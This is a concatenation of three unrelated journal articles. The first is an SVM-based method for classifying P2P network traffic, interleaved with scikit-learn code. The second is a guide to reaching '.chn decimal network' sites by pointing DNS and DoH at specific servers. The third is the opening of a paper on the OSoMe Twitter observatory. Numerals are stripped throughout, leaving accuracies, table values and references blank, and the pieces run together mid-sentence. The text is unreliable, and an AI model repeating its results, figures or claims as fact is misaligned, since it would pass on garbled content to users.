according to the learning knowledge. ye m proposed a new method of identifying p p traffic through data transmission behavior of p p applications [ ]. the data downloaded from the p p host finds the shared data of the download stream and the online upload stream, and proposes a content-based partitioning scheme to divide the stream into data blocks. based on the above viewpoints and taking into account the excellent performance of machine learning and svm in solving p p traffic classification problems [ - ], this paper proposes a network traffic two classification method based on svm. which is used to complete the network flow parameters obtained from the packet header after network traffic collection to classify internet traffic into a wide range of application categories. in the selection process of feature vectors, it should be suitable for svm algorithm and try to calculate independently of the protocol and port. 
therefore, in this paper we choose the number of packets, packet-size characteristics, data-flow timing characteristics, flag bits, and related header information as a preliminary feature vector, and obtain an optimized feature set through several classifier-based feature selection methods. this feature set is used for the initial identification of normal traffic in the network, which reduces the workload of the feature-value matching module and improves the efficiency of the traffic identification system compared with a method that relies on feature-value matching alone. experimental results on traffic from a campus backbone network show that an accuracy of . % can be achieved with regular, biased training and test samples; with bias-free training and test samples over the same feature set, an accuracy of . % can be achieved. in addition, since all feature parameters can be computed from the packet header, the proposed method is also applicable to encrypted network traffic.
ii. proposed method
a. support vector machine (svm) model
svm is a machine learning method grounded in statistical learning theory with good generalization ability, and it is particularly suited to small-sample problems. the data streams in a network yield many candidate features, and too many features degrade both the efficiency and the accuracy of the svm algorithm; therefore, to reduce redundancy, feature combinations with high discriminative power are selected as the feature vector. after the svm-based network traffic classification and identification code is completed, the operating efficiency and the accuracy of the results must also be measured and evaluated. the identification of network traffic is essentially a pattern classification process and involves three main points: 1) the actual problem is mapped into a high-dimensional feature space through a kernel function, so that a hyperplane can separate the data in that space; the classification decision function is constructed so that a problem that is nonlinear in the original dimension becomes linearly separable. the decision function is a linear combination of nonlinear functions parameterized by the support vectors, and its cost depends only on the number of support vectors, which makes kernel methods effective for classification in high-dimensional feature spaces. 2) when the number of labelled training samples is small, the traffic classification task is converted into a quadratic optimization problem to improve classification accuracy; an initial threshold is determined by iterating over feature subsets using the inter-class and intra-class distances of the features. 3) the feature-selection problem is encoded in the style of an evolutionary search; the key requirement is that the encoding can represent every possible subset of the feature set. the optimal hyperplane is then used to optimize the learning ability of the classifier. this approach does not rely on prior probabilities of the traffic samples and generalizes well. when using svm, classifiers with better generalization can be obtained by choosing different kernel functions and relaxation (penalty) factors.
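before turning to the optimization model, the preliminary feature vector named at the start of this section (packet counts, packet-size statistics, flow timing, and flag bits) can be sketched as a small extraction routine. the packet fields, the exact statistics, and the feature order below are assumptions for illustration, not the feature set used in the experiments.

```python
from dataclasses import dataclass
from typing import List
import numpy as np

@dataclass
class Packet:
    timestamp: float   # seconds since capture start
    length: int        # bytes
    is_upstream: bool  # direction relative to the monitored host
    syn: bool          # TCP SYN flag set

def flow_features(packets: List[Packet]) -> np.ndarray:
    """Build one per-flow feature vector: packet count, size statistics,
    flow duration, uplink ratio, and a flag count (illustrative only)."""
    sizes = np.array([p.length for p in packets], dtype=float)
    times = np.array([p.timestamp for p in packets])
    upstream = sum(p.is_upstream for p in packets)
    return np.array([
        len(packets),                 # total number of packets
        sizes.mean(), sizes.std(),    # packet-size statistics
        times.max() - times.min(),    # flow duration
        upstream / len(packets),      # uplink packet ratio
        sum(p.syn for p in packets),  # TCP flag count (SYN)
    ])
```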
the optimization model is as follows. let the training sample set be $\{(x_i, y_i)\},\ i = 1, 2, \ldots, n$; mapping the samples into a high-dimensional feature space and performing regression there gives

$f(x) = \omega^T \phi(x) + b \qquad (1)$

where $\omega$ is the weight vector and $b$ is the offset. equation (1) is converted into a minimization problem; the objective function of svm regression is

$\min_{\omega, b, e}\ \tfrac{1}{2}\|\omega\|^2 + C \sum_{i=1}^{n} e_i^2 \quad \text{s.t.}\quad y_i = \omega^T \phi(x_i) + b + e_i,\ \ i = 1, 2, \ldots, n \qquad (2)$

where $C$ is the penalty parameter and $e_i$ is the regression error. through the lagrangian operator, the corresponding dual problem is obtained from

$L(\omega, b, e, \alpha) = \tfrac{1}{2}\|\omega\|^2 + C \sum_{i=1}^{n} e_i^2 - \sum_{i=1}^{n} \alpha_i \big(\omega^T \phi(x_i) + b + e_i - y_i\big) \qquad (3)$

setting the kernel function $K(x_i, x_j) = \phi(x_i)^T \phi(x_j)$ and adopting the rbf kernel, the nonlinear svm regression model becomes

$f(x) = \sum_{i=1}^{n} \alpha_i \exp\!\left(-\frac{\|x - x_i\|^2}{\sigma^2}\right) + b \qquad (4)$

where $\sigma$ is the kernel width.
b. finding support vectors in training samples
the following rule is introduced to distinguish support vectors. set the threshold of the support-vector decision function to $\lambda = 1$ or $\lambda = -1$, and let the decision function used during detection be $f(x) = \operatorname{sgn}\big\{\sum_{i=1}^{n} \alpha_i y_i K(x_i, x) + b\big\}$; if $f(x) \neq 1$ and $f(x) \neq -1$, the vector $x$ does not belong to the support vectors, otherwise it does. an initial support vector library is trained from known flows: after a known flow passes through the data acquisition module, the feature extraction module, the data preprocessing module, and the training module, a support vector is generated for feature analysis and its characteristic information is added to the support vector library. each kind of known p2p traffic that goes through this process eventually forms a multidimensional support vector group, so a library of known support vectors is built up. finally, the msvm threshold is determined: if the threshold equals 1 (or -1), the detected network traffic is p2p traffic; otherwise it is non-p2p traffic. when selecting p2p traffic characteristics, the feature extraction should reflect the differences among p2p flows as much as possible. different nodes in the network play different roles: some act as servers and provide resource transmission services to other nodes, while others act as clients and consume the services provided by servers. a node in a p2p network can serve other peers as a server and, at the same time, receive services from other peers as a client; traffic from nodes with different roles and services therefore exhibits different behavioral characteristics.
c. support vector machine network traffic identification process
network traffic identification based on support vector machines exploits the ability of svm to handle nonlinear, multi-factor systems: it mines the internal regularities of traffic and models the complex nonlinear relationships underlying traffic change, so as to achieve accurate traffic identification. in the learning and classification process of the svm model, the choice of kernel function plays a decisive role in training and classification performance. frequently studied kernel functions include the linear kernel, the rbf (radial basis function) kernel, and the gaussian kernel; in this paper, the rbf kernel is selected.
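with the rbf kernel chosen, a quick way to prototype such a classifier is scikit-learn's svc, where the penalty parameter c and the kernel width gamma (roughly 1/σ²) correspond to the quantities in the model above. this is a minimal sketch on synthetic feature vectors, not the system implemented in the paper.

```python
import numpy as np
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.svm import SVC

# X: per-flow feature vectors, y: labels (+1 = P2P, -1 = non-P2P); synthetic here.
rng = np.random.default_rng(0)
X = rng.normal(size=(200, 6))
y = np.where(X[:, 0] + X[:, 3] > 0, 1, -1)

# RBF-kernel SVM with penalty parameter C and kernel width gamma.
clf = make_pipeline(StandardScaler(), SVC(kernel="rbf", C=1.0, gamma="scale"))
clf.fit(X, y)
print(clf.predict(X[:5]))
```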
the overall strategy when selecting the kernel function and adjusting parameters is approximately the following steps: preparing a batch of classified data; splitting the data into two groups: a training group and a test group; using a training group to give a support vector machine for training and learning; the support vector machine predicts the classification of test group data and compares it with the actual classification of the number of test groups, calculates the classification accuracy, replaces the parameters, and then iterates again. if we do not use the cross comparison idea, it is very easy to cause the prediction result to be very good only in the case of a specific input. in other cases, the prediction of the parameter is not stable. d. p p traffic classification model based on svm figure shows the classification framework based on svm in this paper. this paper firstly extracts and analyzes the traffic to extract several main characteristics of network traffic that are suitable for recognition in the support vector machine. then, the data is preprocessed, and the known data set for the target problem is set as a training data set, and use an iterative process to train a classification model. the parameters of the model are continuously adjusted by a method of random optimization or analysis, so that it is closest to the actual situation of the training data set. after the model is trained, it can be used to identify unknown samples and dynamically adjust the training sample data by continuously searching for useful training samples to realize the entire network traffic identification based on svm. figure . classification framework based on svm theoretical model ) collector: using port mirroring method to collect data from routers and collect data as raw data and preprocess them. multiple harvesters can be connected in parallel or in series. international journal of advanced network, monitoring and controls volume , no. , ) analyzer: the raw data preprocessed by the collector is subjected to a data feature extraction module to extract the characteristic function parameters. stored in data warehouse. an analyzer can analyze the data of multiple collectors. after the data is preprocessed, the grid search method can be used to verify the optimal parameters of the rbf kernel function for the training data set. so that the analyzer can accurately predict unknown data. ) after the optimal parameters are determined, the training data set can be trained to obtain the support vector machine model. the extracted parameter data is taken as the feature value of the original data, and the continuous features and discrete features existing in the data are converted, and these heterogeneous data sets are translated into machine-readable values by the data preprocessing module. ) multidimensional support vectors are generated by the data after svm training. at the same time, the multidimensional support vectors are formed through the process of different p p traffic data, and one support vector library is formed. ) known p p traffic can get specific p p type through svm library. unknown p p traffic will be subjected to data preprocessing and svm training by the data acquisition device and analyzer extraction feature extraction module, and the extracted feature information will be added to the svm support vector library. after obtaining the specific name of the traffic, it is put into the svm support vector library and finally identifies the specific p p traffic. 
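the cross-comparison strategy described above (split the labelled flows into a training group and a test group, train, score, replace the parameters, and iterate), together with the grid search over the rbf parameters performed by the analyzer, is what a cross-validated grid search automates. a minimal sketch, using synthetic stand-ins for the labelled flow features:

```python
import numpy as np
from sklearn.model_selection import GridSearchCV, train_test_split
from sklearn.svm import SVC

# Synthetic stand-in for labelled per-flow features (illustration only).
rng = np.random.default_rng(0)
X = rng.normal(size=(300, 6))
y = np.where(X[:, 0] + X[:, 3] > 0, 1, -1)

X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=0)

# Search the penalty parameter C and the RBF width gamma on a log grid,
# scoring each pair by 5-fold cross-validated accuracy on the training group.
param_grid = {"C": [0.1, 1, 10, 100], "gamma": [1e-3, 1e-2, 1e-1, 1]}
search = GridSearchCV(SVC(kernel="rbf"), param_grid, cv=5, scoring="accuracy")
search.fit(X_train, y_train)

print("best parameters:", search.best_params_)
print("accuracy on the held-out test group:", search.score(X_test, y_test))
```

cross-validation averages the score over several train/test splits, which avoids the situation the paper warns about, where a single lucky split makes an unstable parameter choice look good.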
the initial svm support vector library is a vector library that is trained by known traffic. when the known traffic is subjected to initial data acquisition and feature extraction, data preprocessing, and svm training, multidimensional support vectors are generated, multidimensional support vectors are characterized, and their characteristic information is added to the svm support vector library. known traffic can also form a multidimensional support vector group through the above process. iii. experiments a. traffic data collection select a network server outlet network traffic to carry on the simulation experiment, take ms as the sampling time, select the total number of data packets, uplink traffic ratio, average length, tcp traffic ratio and the ratio of the number of connections and different ip number five traffic characteristics as input data feature information, set up the data set as a training sample set and separate and collate, and preprocess the collected data and normalize it. the collected data samples are shown in table . table i. collected data samples dataset time (ms) total flow dataseta hour datasetb hour datasetc hour datasetd hour datasete day among them, the first four sets of data are used as input data for the training module. datasete is used as the data set to be tested. three support vector machines are constructed here, namely svm , svm , and svm . after training the classifiers svm , svm , and svm , datasete was used as the test sample data set, and experimental results were obtained through the svm classifier. b. finding optimal parameters the algorithm based on the cross-validation idea is used to select an optimal parameter value c for the rbf kernel function and optimal parameters c and r for the training data set. the labels of the two categories are - and , which are iterated times. the trained model is saved in the data.model file. the following information can be obtained from this file: the svm type used for training is c_svm, the kernel function is the radial basis function rbf, the r value is . , the total number of support vectors is , and the value of the decision function constant term b is . . each type of support vector is , , . after the training is completed, the model can be used for svm type prediction. international journal of advanced network, monitoring and controls volume , no. , read the file to be predicted, the model file, and then call the function prediction and output the result to a file. ) after cross test the data, the prediction accuracy is . %. ) when choose the best parameters (c, r), if the cross validation method of grid search is not adopted, the result of cross validation is not adopted with the default value of . according to the method described above, the prediction accuracy is . % obtained by predicting the unknown data through the obtained model. it can be seen that the choice of optimal parameters (c, r) can improve the prediction accuracy of the results. ) repeated training and learning. in order to reflect the learning process of svm, a total of experiments were conducted, by continuously capturing data, the captured data are preprocessed, trained, and predicted. with continuous learning, the accuracy of predictions continues to increase, reaching . %, . %, . %, . %, . %, . %, . %, . %, . % and . % respectively. it can be seen that multiple learning is conducive to classification judgment. however, the learning process also needs to be controlled. excessive learning will bring negative effects on classification. 
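the repeated capture, train, and predict cycle described above can be prototyped as a simple loop in which each round's newly labelled flows are folded into the training pool before the model is refit. the capture_batch helper below is a hypothetical stand-in for the data acquisition and preprocessing modules, and the synthetic data is for illustration only.

```python
import numpy as np
from sklearn.metrics import accuracy_score
from sklearn.svm import SVC

def capture_batch(round_id):
    """Hypothetical stand-in for one round of capture + preprocessing:
    returns per-flow feature vectors and labels (+1 = P2P, -1 = non-P2P)."""
    rng = np.random.default_rng(round_id)
    Xb = rng.normal(size=(50, 6))
    yb = np.where(Xb[:, 0] + Xb[:, 3] > 0, 1, -1)
    return Xb, yb

X_pool, y_pool = capture_batch(0)          # initial training pool
for round_id in range(1, 10):
    model = SVC(kernel="rbf", C=10, gamma=0.1).fit(X_pool, y_pool)
    Xb, yb = capture_batch(round_id)       # newly captured traffic
    acc = accuracy_score(yb, model.predict(Xb))
    print(f"round {round_id}: accuracy = {acc:.3f}")
    # Fold the newly observed (now labelled) flows back into the training pool.
    X_pool = np.vstack([X_pool, Xb])
    y_pool = np.concatenate([y_pool, yb])
```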
iv. discussion the model obtained after training can be used for svm traffic identification. various p p traffic and accuracy are identified from packet capture, preprocessing, recognition, learning and training, and compared with the recognition accuracy based on the bayesian traffic identification model, the recognition method of the svm has obtained higher accuracy than the original traffic recognition method in practical application.figure shows the comparison of different traffic models. figure . comparison of different models from figure , we can see that for the four kinds of p p traffic in this experiment, the classification and recognition rate of this classifier is all above %, so the effect of this mc-svm classifier on application layer classification of p p traffic is very good. international journal of advanced network, monitoring and controls volume , no. , figure . comparison of stability between bayesian and svm figure is by using a p p traffic recognition model based on bayesian and svm. with the increase of training data sets, the average classification accuracy can still maintain a certain stability, and the accuracy of recognition reaches . %. it can be seen that the recognition method of svm has higher accuracy than the original traffic recognition method in practical application. v. conclusions svm algorithm is suitable for nonlinear time series modeling and prediction, so it can well identify the trend of network traffic changes. this paper conducts empirical experiments on the actual data of network traffic. the results show that, compared with the commonly used prediction methods, the recognition model based on svm can solve the traffic identification. at the same time, it can identify the unknown and large traffic p p types, and has good effect on the identification of encrypted p p traffic, and has higher prediction accuracy and better adaptability. acknowledgements fund support: national natural science foundation, researchonsub-nyquistsamplingofshortpulsesbasedxampli ngundergaborframes, [ ]; shaanxi education department special fund, projectnumber: shaanxi education finance[ ] . references [ ] schulze h, mochalski k. internet study [j]. ipoque gmbh, . [ ] madhukar a, williamson c. a longitudinal study of p p traffic classification[c]// ieee international symposium on modeling, analysis, and simulation of computer and telecommunication systems. ieee, : - . [ ] ma j, levchenko k, kreibich c, et al. unexpected means of protocol inference[c]// acm sigcomm conference on internet measurement. acm, : - . [ ] moore a w, papagiannaki k. toward the accurate identification of network applications[c]// international conference on passive and active network measurement. springer-verlag, : - . [ ] haffner p, sen s, spatscheck o, et al. acas: automated construction of application signatures[c]// acm sigcomm workshop on mining network data. acm, : - . [ ] huang k, zhang q, zhou c, et al. an efficient intrusion detection approach for visual sensor networks based on traffic pattern learning[j]. ieee transactions on systems man & cybernetics systems, , pp( ): - . [ ] yuan r, li z, guan x, et al. an svm-based machine learning method for accurate internet traffic classification[j]. information systems frontiers, , ( ): - . [ ] i ana.internet assigned numbers authority[eb/ol].http: //www.iana.org/assigu mens/port-numbers. [ ] spatscheck o, sen s, wang d. method and apparatus for automatically constructing application signatures: us, us b [p]. . 
[ ] yang c s, liao m y, luo m y, et al. a network management system based on dpi[c]// international conference on network-based information systems. ieee computer society, : - . [ ] hartigan j a, wong m a. algorithm as : a k-means clustering algorithm[j]. journal of the royal statistical society, , ( ): - . [ ] liu h, yu l. yu, l.: toward integrating feature selection algorithm for classification and clustering. ieee transaction on knowledge and data engineering ( ), - [j]. ieee transactions on knowledge & data engineering, , ( ): - . [ ] pedro s d s. collective intelligence as a source for machine learning self-supervision[c]// international workshop on web intelligence & communities. acm, : . classification accuracy(%) international journal of advanced network, monitoring and controls volume , no. , [ ] chapelle o. semi-supervised learning (adaptive computation and machine learning)[j]. mit pr, . [ ] liu s, dou z t, li f, et al. a new ant colony clustering algorithm based on dbscan[c]// international conference on machine learning and cybernetics. ieee, : - vol. . [ ] este a, gringoli f, salgarelli l. on-line svm traffic classification[c]// wireless communications and mobile computing conference. ieee, : - . [ ] osuna e, freund r, girosi f. training svm: an application to face detection[c]// . [ ] este a, gringoli f, salgarelli l. on-line svm traffic classification[c]// wireless communications and mobile computing conference. ieee, : - . [ ] zhou x. a p p traffic classification method based on svm[c]// international symposium on computer science and computational technology. ieee computer society, : - . [ ] bernaille l, teixeira r, akodkenou i, et al. traffic classification on the fly[j]. acm sigcomm computer communication review, , ( ): - . [ ] jinhuaxu, hongliu. web user clustering analysis based on kmeans algorithm[c]// international conference on information,networking and automation. :v - -v - . [ ] poornalatha g, raghavendra p s. web user session clustering using modified k-means algorithm[m]// advances in computing and communications. springer berlin heidelberg, : - . [ ] wang t z. the development of web log mining based on improve-k-means clustering analysis[m]// advances in computer science and information engineering. springer berlin heidelberg, : - . [ ] ye m, wu j, xu k, et al. identify p p traffic by inspecting data transfer behaviour[j]. computer communications, , ( ): - . [ ] tapaswi s, gupta a s. flow-based p p network traffic classification using machine learning[c]// international conference on cyber-enabled distributed computing and knowledge discovery. ieee, : - . [ ] deng h, yang a m. p p traffic classification method based on svm[j]. computer engineering & applications, . [ ] yang a m, jiang s y, deng h. a p p network traffic classification method using svm[c]// young computer scientists, . icycs . the, international conference for. ieee, : - . [ ] jiang w, wang c z, luo h f, et al. research on a method of p p traffic detection based on svm[j]. journal of hubei university of technology, . [ ] zhu a. a p p network traffic classification method based on c . decision tree algorithm[m]// proceedings of the th international symposium on linear drives for industry applications, volume . springer berlin heidelberg, : - . international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - a method to access a decimal network (ipv ) resource guangzhou liu, fuya yu xi'an decimal network technology co. ltd xi'an v network research institute co. 
ltd email: @qq.com abstract—network security is highly valued by world leaders. the current internet technology core is ipv , ipv , completely controlled by the united states. on december , , the us federal communications commission (fcc) formally abolished the net neutrality law. at that time, the internet took on an obvious political color and posed a serious threat to internet applications in various countries. china's economy is already highly dependent on the internet, and if the network is disrupted, the whole country will suffer heavy losses. the decimal network standard working group of the ministry of industry and information technology of china and the decimal network information technology co., ltd of shanghai have been researching on the future network for more than years. developed a complete set of decimal network framework system, completed the future network series research and development with china's independent intellectual property rights, and built the second internet network system besides the united states. the technology has been fully tested in many places and achieved good results, truly achieving the goal of "autonomy, safety, high speed and compatibility". this paper will introduce the method of accessing decimal network resources in the current network environment. keywords-decimal network; chn; domain name; network resources decimal network is a complete independent intellectual property rights based overall decimal digital code, the establishment of times of cyberspace sovereignty. it includes root domain name servers from the parent root, the primary root, and the zero-trust security mechanism for communication after verification. compatible with current internet systems, it has a future internet architecture that overlaps geographical location and ip address space. most internet applications today are based on ipv environments. in the context of the existing internet network, the ipv .chn domain name network can be accessed by setting up the existing computer or terminal. most current computer browsers and mobile browsers support access. for example, firefox, google chrome, microsoft edge, speed browser and so on are common on computers. safari and baidu browser commonly used on mobile phones need to set the network dns and point to the ipv dns server before using the browser to open the website. the addresses are: . . . and . . . . once set up, you can access the resources of the decimal network in the current internet environment. before visiting, a few typical ipv sites are recommended, as shown in table . here are the steps to accessing the .c web site on your pc and mobile phone. international journal of advanced network, monitoring and controls volume , no. , table i. typical chn domain name websites website domain name web resources resource management resources to address http://www.v .chn .chn portal website decimal network standard working group shanghai http://em .chn decimal technology introduction website shanghai decimal network information technology co. ltd shanghai http://www.xav .chn xi 'an decimal system portal xi 'an decimal network technology co. ltd xi 'an http://www.xa.chn v research institute portal xi 'an weijiu research institute co. ltd xi 'an http://www.hqq.chn/ the red flag canal craftsman xi 'an decimal network technology co. ltd xi 'an http://www.zjsjz.chn zhejiang decimal system portal website zhejiang decimal network co. ltd hangzhou http://www.zjbdth.chn beidou day draw beidou tianhua information technology co. 
ltd hangzhou i. computer access. chn website settings introduce with windows system settings (pc). ) first click the "network" icon on the desktop and select the "properties" option. the interface appears as shown in figure . figure . network and share center setup interface international journal of advanced network, monitoring and controls volume , no. , ) click the "connection: ethernet" option in the network and sharing center setting interface. the interface appears as shown in figure . figure . ethernet status interface ) in the ethernet status interface, click the "properties" button. the dialog box appears as shown in figure . figure . ethernet property interface ) in the ethernet property interface, double-click the option "internet protocol version (tcp/ipv )". the dialog box appears as shown in figure . setting the preferred dns and alternate dns and finished setup. figure . internet protocol version (tcp/ipv ) properties ) open a browser. firefox or google chrome is recommended. enter http://www.hqq.chn in the browser address bar to access the ipv site, as shown in figure . ii. mobile access .chn website at present, there are many types of mobile phones, but the setting method is similar. android mobile phone can download the plug-in (download address: https://www.dtgty.com/homesearch) by flow direct access. but in most cases, access to .chn resources will be more convenient over local wi-fi. it can also be accessed through mobile hotspots, with the same settings as wi-fi and mobile hotspots. take huawei (android system) mobile phone and iphone (ios system) mobile phone as an example to introduce the setting method of mobile dns. international journal of advanced network, monitoring and controls volume , no. , a. huawei mobile phone setting the phone type is huawei mate , android and emui . . . ) click "settings" on the desktop of the mobile phone to display the setting interface, as shown in figure . figure . access the ipv site figure . mobile phone setting interface figure . wireless connection setting interface international journal of advanced network, monitoring and controls volume , no. , ) click "wireless lan" in the interface, and the interface appears as shown in figure . ) press on the connected network name for a while, and additional menu options appear, as shown in figure . click "modify network" menu, the interface of network parameter setting appears, and select "display advanced options", as shown in figure . select the "static" option, as shown in figure . figure . modification of network interface figure . parameter setting interface ) modify dns according to the parameters in the figure. after modification, click "save" button to complete the setting. figure . modification of network interface figure . parameter setting interface ) return to the main interface of the mobile phone and enter http://www.xand.chn in the browser international journal of advanced network, monitoring and controls volume , no. , (firefox or google chrome) to browse the overseas study service website for testing, as shown in figure . the rest are xiaomi phones, vivo phones and so on. you can access ipv network resources by simply setting the dns settings for the connection network. b. iphone parameter setting mobile phone model: iphone xr, system: ios . . ) click "settings" on the desktop of the mobile phone to appear the setting interface. click "wireless lan" in the interface. the interface appears as shown in figure . 
) click the icon on the right of the connected wlan, and the network setting interface appears, as shown in figure . figure . interface of wireless lan figure figure . interface of wireless connection parameters figure . dns setting interface ) in the setting interface, select "configure dns" and the dns setting interface appears, as shown in figure . select the add server option and enter the dns address shown in the figure. click the "save" command in the upper right corner of the interface to complete the setup. ) open the browser. enter http://www.xav .chn in the address bar to open the main interface of xi 'an future network, as shown in figure . iii. method of accessing ipv website with chinese domain name in addition to accessing network resources through character domain names, the decimal network system can also use chinese domain names to access, in the format: http:// chinese.*****, but before access to the following settings. take the firefox browser, for example. ) open the firefox browser and click the menu button in the upper right corner to open the browser settings menu, as shown in figure . international journal of advanced network, monitoring and controls volume , no. , figure . xi 'an future network main interface figure . firefox menu settings screen international journal of advanced network, monitoring and controls volume , no. , ) click the "options" command, drag the right scroll bar to the bottom of the page, and network settings appear, as shown in figure . figure . firefox menu options screen ) click the "settings" button in network settings, and the "connection settings" dialog box appears, as shown in figure . in the configure proxy server to access the internet option, select do not use proxy server (y), and then select enable https dns at the bottom of the screen. finally enter https://doh.zsw .cn/dns.query in the "custom" edit box. ) after setting, click "ok" button to complete setting. enter the chinese domain name "china micro nine research institute" into the firefox browser to access chinese website resources. this is shown in figure . to facilitate test access, several typical ipv sites are recommended, as shown in table . international journal of advanced network, monitoring and controls volume , no. , figure . firefox connection settings screen figure . website of xi 'an v research institute international journal of advanced network, monitoring and controls volume , no. , table ii. typical chinese domain name websites character of the domain name web resources chinese domain name resource management http://www.ijanmc.chn new online international journals http:// in china. new network and detection control xi’an technological university http://www.iccnea.chn iccnea international conference website http:// in china. the international conference on xi’an technological university http://www.xa.chn .chn portal website http:// in china. micro nine research institute xi 'an decimal network company http://www.xav .chn xi 'an decimal system portal http:// in china. xi 'an future network portal xi 'an decimal network company http://www.xand.chn xi 'an norton study abroad website http:// in china. xi 'an norton study abroad xi 'an decimal network company http://www.hqq.chn the red flag canal craftsman http:// in china. 
the red flag canal craftsman xi 'an decimal network company http://www.xazn.chn the website of zhengnuo conference company the website of zhengnuo conference company xi 'an decimal network company in addition to accessing network resources through character domain names and chinese characters, the decimal address can also be used to access resources. a website corresponds to a decimal address. at the same time, we can also realize a decimal address corresponding to multiple network resources in the way of subdirectory structure. since decimal address access is bound to the computer in the background, setup is cumbersome, and only a presentation interface is provided here, as shown in figure . figure . red flag canal craftsman website international journal of advanced network, monitoring and controls volume , no. , at present the decimal network is in the experimental application stage, although the network resources are less, but the original resources running on the internet can be completely translated to the decimal network system. with the introduction of national policy, the decimal network of resources will be more and more. the decimal network application of china's independent intellectual property rights is bound to enter thousands of households. iv. conclusion this paper introduces the method of using browser to access decimal network resources through personal computer terminal or personal mobile phone under the current internet environment. a simple dns setup is required to point to the decimal server to complete resource access. the setup is very simple, which lays the foundation for a wide range of network applications. reference [ ] xie jianping. a method for assigning addresses to networked computers using full decimal algorithm, chinese patent no. : zl . , . . . [ ] xie jianping. a method for assigning addresses to networked computers using a full decimal algorithm, u.s. patent no. :us: , [ ] rfc - internet standard. internet protocol, darpa internet program protocol specification, rfc , . . [ ] s. deering, r. hinden, network working group. internet protocol, version (ipv )-specification, rfc- , . . [ ] m. crawford. network working group. transmission of ipv packets over ethernet networks. rfc- , . . [ ] j. onions, network working group. a historical perspective on the usage of ip version . rfc . . . [ ] v. cerf, network working group. a view from the st century, rfc . . . submitted may accepted august published october corresponding author giovanni luca ciampaglia, gciampag@indiana.edu academic editor silvio peroni additional information and declarations can be found on page doi . /peerj-cs. copyright davis et al. distributed under creative commons cc-by . open access osome: the iuni observatory on social media clayton a. davis , ,*, giovanni luca ciampaglia , ,*, luca maria aiello , keychul chung , michael d. conover , emilio ferrara , alessandro flammini , , , geoffrey c. fox , xiaoming gao , bruno gonçalves , przemyslaw a. grabowicz , kibeom hong , pik-mai hui , , scott mccaulay , karissa mckelvey , mark r. meiss , snehal patil , chathuri peli kankanamalage , valentin pentchev , judy qiu , jacob ratkiewicz , alex rudnick , benjamin serrette , prashant shiralkar , , onur varol , , lilian weng , tak-lon wu , andrew j. 
younge and filippo menczer , , center for complex networks and systems research, indiana university, bloomington, united states school of informatics and computing, indiana university, bloomington, united states network science institute, indiana university, bloomington, united states bell labs, london, united kingdom linkedin inc., mountain view, ca, united states information sciences institute, university of southern california, marina del rey, ca, united states facebook inc., boston, ma, united states center for data science, new york university, new york, ny, united states max planck institute for software systems saarbrücken, germany, us open data, oakland, ca, united states google inc., mountain view, ca, united states yahoo inc., sunnyvale, ca, united states affirm inc., san francisco, ca, united states amazon inc., seattle, wa, united states * these authors contributed equally to this work. abstract the study of social phenomena is becoming increasingly reliant on big data from online social networks. broad access to social media data, however, requires software development skills that not all researchers possess. here we present the iuni observa- tory on social media, an open analytics platform designed to facilitate computational social science. the system leverages a historical, ongoing collection of over billion public messages from twitter. we illustrate a number of interactive open-source tools to retrieve, visualize, and analyze derived data from this collection. the observatory, now available at osome.iuni.iu.edu, is the result of a large, six-year collaborative effort coordinated by the indiana university network science institute. subjects data science, network science and online social networks, social computing, world wide web and web science keywords social media, observatory, twitter, web science, network science, meme diffusion, computational social science, big data, api, osome introduction the collective processes of production, consumption, and diffusion of information on social media are starting to reveal a significant portion of human social life, yet scientists how to cite this article davis et al. ( ), osome: the iuni observatory on social media. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:gciampag@indiana.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://osome.iuni.iu.edu http://dx.doi.org/ . /peerj-cs. struggle to get access to data about it. recent research has shown that social media can perform as ‘sensors’ for collective activity at multiple scales (lazer et al., ). as a consequence, data extracted from social media platforms are increasingly used side-by-side with—and sometimes even replacing—traditional methods to investigate hard-pressing questions in the social, behavioral, and economic (sbe) sciences (king, ; moran et al., ; einav & levin, ). for example, interpersonal connections from facebook have been used to replicate the famous experiment by travers & milgram ( ) on a global scale (backstrom et al., ); the emotional content of social media streams has been used to estimate macroeconomic quantities in country-wide economies (bollen, mao & zeng, ; choi & varian, ; antenucci et al., ); and imagery from instagram has been mined (de choudhury et al., ; andalibi, ozturk & forte, ) to understand the spread of depression among teenagers (link et al., ). 
a significant amount of work about information production, consumption, and diffusion has been thus aimed at modeling these processes and empirically discriminating among models of mechanisms driving the spread of memes on social media networks such as twitter (guille et al., ). a set of research questions relate to how social network structure, user interests, competition for finite attention, and other factors affect the manner in which information is disseminated and why some ideas cause viral explosions while others are quickly forgotten. such questions have been addressed both in an empirical and in more theoretical terms. examples of empirical works concerned with these questions include geographic and temporal patterns in social movements (conover et al., b; conover et al., a; varol et al., ), the polarization of online political discourse (conover et al., b; conover et al., a; conover et al., ), the use of social media data to predict election outcomes (digrazia et al., ) and stock market movements (bollen, mao & zeng, ), the geographic diffusion of trending topics (ferrara et al., ), and the lifecycle of information in the attention economy (ciampaglia, flammini & menczer, ). on the more theoretical side, agent-based models have been proposed to explain how limited individual attention affects what information we propagate (weng et al., ), what social connections we make (weng et al., ), and how the structure of social and topical networks can help predict which memes are likely to become viral (weng, menczer & ahn, ; weng, menczer & ahn, ; nematzadeh et al., ; weng & menczer, ). broad access by the research community to social media platforms is, however, limited by a host of factors. one obvious limitation is due to the commercial nature of these services. on these platforms, data are collected as part of normal operations, but this is seldom done keeping in mind the needs of researchers. in some cases researchers have been allowed to harvest data through programmatic interfaces, or apis. however, the information that a single researcher can gather through an api typically offers only a limited view of the phenomena under study; access to historical data is often restricted or unavailable (zimmer, ). moreover, these samples are often collected using ad-hoc procedures, and the statistical biases introduced by these practices are only starting to be understood (morstatter et al., ; ruths & pfeffer, ; hargittai, ). davis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the osome website is also available at truthy.indiana.edu. the original website was created to host our first demo, motivated by the application of social media analytics to the study of ‘‘astroturf,’’ or artificial grassroots social media campaigns orchestrated through fake accounts and social bots (ratkiewicz et al., b). the truthy nickname was later adopted in the media to refer to the entire project. the current website includes information about other research projects on information diffusion and social bots from our lab. a second limitation is related to the ease of use of apis, which are usually meant for software developers, not researchers. while researchers in the sbe sciences are increasingly acquiring software development skills (terna, ; raento, 